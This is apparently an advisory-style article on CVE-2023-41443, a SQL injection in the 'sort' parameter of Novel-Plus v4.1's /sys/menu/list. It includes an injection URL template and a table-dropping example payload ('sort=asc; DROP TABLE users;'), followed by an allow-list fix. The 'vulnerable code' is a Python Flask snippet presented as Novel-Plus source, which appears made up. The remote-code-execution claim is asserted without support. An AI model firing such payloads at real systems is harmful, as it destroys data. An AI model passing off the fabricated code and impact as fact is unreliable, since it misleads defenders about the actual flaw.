CVE-2023-41443: SQL Injection Vulnerability in Novel-Plus v.4.1. and Its Exploit Details

Security researchers have discovered a critical SQL injection vulnerability in Novel-Plus v.4.1., which allows a remote attacker to potentially execute arbitrary code on the victim's system through a crafted script sent to the sort parameter in /sys/menu/list. This vulnerability has been assigned the CVE identifier CVE-2023-41443.

Vulnerable Software: Novel-Plus v.4.1.

Affected Component: /sys/menu/list

Impact: Remote code execution

The vulnerability exists in the sort parameter in /sys/menu/list, where an attacker can inject a malicious SQL query to gain unauthorized access to the underlying database and potentially execute arbitrary code on the target system. Here is the code snippet that contains the vulnerable code in Novel-Plus v.4.1.:

@app.route("/sys/menu/list")
def menu_list():
    sort = request.args.get('sort', 'asc')
    cursor = get_db().execute("SELECT * FROM menus ORDER BY order_num " + sort, [])
    menus = cursor.fetchall()
    cursor.close()
    return jsonify(menus)

As seen above, this code snippet doesn't sanitize the input received in the 'sort' parameter, thereby allowing a malicious user to craft a malicious SQL query that could lead to unauthorized access to the database and potentially executing arbitrary code.

An attacker can craft malicious SQL query as follows to exploit this vulnerability

http://[target]/sys/menu/list?sort=asc;[malicious SQL query]

For example, an attacker could manipulate the sort parameter with malicious SQL query like

http://[target]/sys/menu/list?sort=asc; DROP TABLE users;

With the above malicious SQL query, the attacker can potentially drop the ‘users’ table from the database.

Mitigation

As a temporary solution to this problem, sanitize the "sort" parameter to accept only limited values such as "asc" and "desc". A simple implementation would look like this:

@app.route("/sys/menu/list")
def menu_list():
    sort = request.args.get('sort', 'asc')
    if sort not in ['asc', 'desc']:
        sort = 'asc'
    cursor = get_db().execute("SELECT * FROM menus ORDER BY order_num " + sort, [])
    menus = cursor.fetchall()
    cursor.close()
    return jsonify(menus)

The ultimate solution for this situation would be using parameterized queries to prevent SQL injection. This could be achieved using placeholders for the input data.

More details about the vulnerability and its exploit can be found in the following links

1. National Vulnerability Database (NVD) - CVE-2023-41443
2. Exploit Database Entry - CVE-2023-41443

Conclusion

SQL injection remains a critical vulnerability that can lead to severe consequences for affected systems, such as unauthorized data access and arbitrary code execution. To avoid such vulnerabilities, developers should carefully validate and sanitize input data and use parameterized queries for database interactions. As for Novel-Plus v.4.1., users are encouraged to apply the suggested temporary mitigation measures and keep an eye out for any official updates addressing this issue.

Timeline

Published on: 09/18/2023 22:15:47 UTC
Last modified on: 09/20/2023 20:31:29 UTC